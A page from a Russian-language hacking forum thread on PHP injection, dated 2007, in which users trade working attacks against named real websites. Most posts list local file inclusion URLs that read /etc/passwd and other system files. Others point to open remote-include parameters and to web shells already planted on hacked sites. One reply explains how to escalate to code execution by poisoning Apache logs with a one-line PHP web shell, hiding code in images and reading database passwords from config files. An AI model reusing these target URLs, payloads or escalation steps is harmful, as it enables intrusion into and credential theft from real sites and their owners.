ФОРУМ    ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу PHP Иньекции
   
 
Страница 53 из 116 « Первая < 343 49 50 51 52 53 54 55 56 57 63103 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #521  
Старый 30.10.2007, 19:04
t0ox
Новичок
Регистрация: 23.10.2007
Сообщений: 17
Провел на форуме:
105851

Репутация: 46
По умолчанию
Код:
http://www.sodepau.org/cat/index.php?id=../../../../../etc/passwd
http://www.sodepau.org/cat/index.php?id=../../../../../etc/hosts
http://www.sodepau.org/cat/index.php?id=../../../../../etc/services
http://www.sodepau.org/cat/index.php?id=../../../../../etc/group
http://www.sodepau.org/cat/index.php?id=../../../../../etc/profile
 

  #522  
Старый 02.11.2007, 14:35
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
будьте внимательны, и получите шелл ;-) а там
Free space : 1550.16 GB Total space: 1805.85 GB

Цитата:
http://austin.smallplanetguide.com/rentals/index.php?p=
 

  #523  
Старый 02.11.2007, 17:10
nikoTM
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723

Репутация: 22
По умолчанию
Локальный инклудинг

Код:
http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/passwd
http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/ftpusers
http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/hosts
http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/group
http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/services
http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/profile
я ничего не смог там сделать(
 

  #524  
Старый 02.11.2007, 17:14
nikoTM
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723

Репутация: 22
По умолчанию
тож локалка
Код:
http://www.barsandstuds.co.uk/index.php?page=../../../../../../../../etc/passwd
Обьясните мне плз в чем смысл находить etc/passwd?
 

  #525  
Старый 03.11.2007, 04:20
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
WindowS =)

Цитата:
http://israndom.com/default.php?content=
Ru

Цитата:
http://www.gumanitarij.ru/newsite/default.php?content=
ps: обычно смысл в том,что в passwd пути к папкам юзеров. также можн опопробовать связки логин пароль на фтп,БД и т.д. )
Последний раз редактировалось $n@ke; 03.11.2007 в 04:43..
 

  #526  
Старый 03.11.2007, 05:15
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию
Цитата:
Сообщение от nikoTM  
тож локалка
Код:
http://www.barsandstuds.co.uk/index.php?page=../../../../../../../../etc/passwd
Обьясните мне плз в чем смысл находить etc/passwd?
Смысл в том, что /etc/passwd есть на любой nix-ОС и если получилось его заинклюдить (как вариант прочитать), то значит как минимум локальный инклюд есть (я не беру вариант с опенбэйздир) и не надо подбирать путьк нему, т.к. при любом (большом) количестве /../ ты всеравно его прочитаешь (потому что выше рута / не прыгнешь), а дальше все, что подскажет тебе воображение...
например есть локальный инклюд, ты можешь:

1) прочитать и использовать passwd файл для брута по маске login:login (к тому же узнать путь к домашним директориям пользователей, иногда очень нужно)

2) узнав методом перебора стандартных путей путь к логам апача, ты можешь намеренно вызвать ошибку, записать к примеру в error_log php код а потом этот error_log проинклюдить (заметь локально) и соответственно этот код выполнить (например элементарный веб-шелл <?php system($_GET[cmd]); ?>)

3) если на сайте есть возможность заливки картинок, то ты можешь вставить php код в gif или в Exif данные jpeg картинки, а потом с помошью все того же локального инклюда выполнить этот код (проинклюдив картинку)

4) Есть у тебя к примеру SQL инъекция и у пользователя БД есть права filepriv, но ты не можешь записать шелл т.к. незнаешь путей, или нет ни одной паки доступной из веба с правами на запись, в первом случае ты можешь прочитать файл httpd.conf (если найдешь, и если будут права на чтение) и узнать пути, хотя это можно сделать и через sql-inj, при втором варианте ты пишешь свой шелл в /tmp и с помощью локального инклюда подцепляешь свой шелл из /tmp

5) куча вариантов, насколько фантазии хватит


Если есть просто читалка файлов, то ты можешь посмотреть файлы конфигурации на сайте и узнать пароль и пользователя БД (обычно они в незашифрованном виде)

ну надеюсь ты понял...
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 03.11.2007 в 05:19..
 

  #527  
Старый 03.11.2007, 16:54
nikoTM
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723

Репутация: 22
По умолчанию
да, огромное спс!
 

  #528  
Старый 05.11.2007, 01:18
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию
Windows NT DS-31077-1 5.2 build 3790

http://nyec.modernsignal.net/content/documents/document2.php

-----

http://www.ncti-india.com/ncti-archive/txtfiles/roki.php
http://sayko-esrarci.com/r57.php
http://milfmuncher.net/dump.php
http://www.karizmatikshow.com/zzz.php
http://pp.dhbl.org/phpshell/r57.php
http://myauction.us/banners/r57shel.jpg.pdf.swf.php
http://www.wshakespeare.net/images/r57shell.htm
Последний раз редактировалось ~!DoK_tOR!~; 05.11.2007 в 01:21..
 

  #529  
Старый 05.11.2007, 02:09
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
Free space : 1665.75 GB Total space: 3209.17 GB

этот shell.php сразу в глаза бросилса...ну и названьице))
Цитата:
http://www.gracestillwater.us/shell.php?content=
 

  #530  
Старый 05.11.2007, 11:55
t0ox
Новичок
Регистрация: 23.10.2007
Сообщений: 17
Провел на форуме:
105851

Репутация: 46
По умолчанию
Код:
http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/passwd
http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/hosts
http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/group
http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/services
http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/profile
http://www.allywoodall.com/aw/index.php?page=../../../../../../../etc/syslog.conf
Код:
http://www.iswizards.com/index.php?PAGE=../../../../etc/passwd
http://www.iswizards.com/index.php?PAGE=../../../../etc/hosts
http://www.iswizards.com/index.php?PAGE=../../../../etc/group
http://www.iswizards.com/index.php?PAGE=../../../../etc/services
http://www.iswizards.com/index.php?PAGE=../../../../etc/profile
http://www.iswizards.com/index.php?PAGE=../../../../etc/syslog.conf
Код:
http://www.whototake.com/index.php?page=../../../../../etc/passwd
http://www.whototake.com/index.php?page=../../../../../etc/hosts
http://www.whototake.com/index.php?page=../../../../../etc/group
http://www.whototake.com/index.php?page=../../../../../etc/services
http://www.whototake.com/index.php?page=../../../../../etc/profile
http://www.whototake.com/index.php?page=../../../../../etc/syslog.conf
Код:
http://deine-lernlinks.de/index.php?page=../../../../../etc/passwd
http://deine-lernlinks.de/index.php?page=../../../../../etc/hosts
http://deine-lernlinks.de/index.php?page=../../../../../etc/group
http://deine-lernlinks.de/index.php?page=../../../../../etc/services
Код:
http://www.aiongenesis.com/index.php?page=../../../../../etc/passwd
http://www.aiongenesis.com/index.php?page=../../../../../etc/hosts
http://www.aiongenesis.com/index.php?page=../../../../../etc/group
http://www.aiongenesis.com/index.php?page=../../../../../etc/services
http://www.aiongenesis.com/index.php?page=../../../../../etc/profile
http://www.aiongenesis.com/index.php?page=../../../../../etc/syslog.conf
Код:
http://www.sodepau.org/cat/index.php?id=../../../../../../etc/passwd
http://www.sodepau.org/cat/index.php?id=../../../../../../etc/hosts
http://www.sodepau.org/cat/index.php?id=../../../../../../etc/group
http://www.sodepau.org/cat/index.php?id=../../../../../../etc/services
http://www.sodepau.org/cat/index.php?id=../../../../../../etc/profile
http://www.sodepau.org/cat/index.php?id=../../../../../../etc/syslog.conf
Код:
http://www.juze-rheinbach.de/index.php?include=../../../../../../etc/passwd
http://www.juze-rheinbach.de/index.php?include=../../../../../../etc/hosts
http://www.juze-rheinbach.de/index.php?include=../../../../../../etc/group
http://www.juze-rheinbach.de/index.php?include=../../../../../../etc/services
http://www.juze-rheinbach.de/index.php?include=../../../../../../etc/profile
Код:
http://www.ev-kircherheinbach.de/index.php?include=../../../../../etc/passwd
http://www.ev-kircherheinbach.de/index.php?include=../../../../../etc/hosts
http://www.ev-kircherheinbach.de/index.php?include=../../../../../etc/group
http://www.ev-kircherheinbach.de/index.php?include=../../../../../etc/services
http://www.ev-kircherheinbach.de/index.php?include=../../../../../etc/profile
Код:
http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/passwd
http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/hosts
http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/group
http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/services
http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/profile
http://www.sawtoothoutfitters.com/index.php?Content=../../../../../../etc/syslog.conf
Код:
http://www.ymcacanberra.org.au/index.php?content=../../../../../../../etc/passwd
http://www.ymcacanberra.org.au/index.php?content=../../../../../../../etc/hosts
http://www.ymcacanberra.org.au/index.php?content=../../../../../../../etc/group
http://www.ymcacanberra.org.au/index.php?content=../../../../../../../etc/services
http://www.ymcacanberra.org.au/index.php?content=../../../../../../../etc/profile
Код:
http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/passwd
http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/hosts
http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/group
http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/services
http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/profile
http://thatsnotevenfunny.com/index.php?main=../../../../../../etc/syslog.conf
Последний раз редактировалось t0ox; 05.11.2007 в 12:43..
 
 
Страница 53 из 116 « Первая < 343 49 50 51 52 53 54 55 56 57 63103 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PSalm69 Избранное 248 27.10.2009 04:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ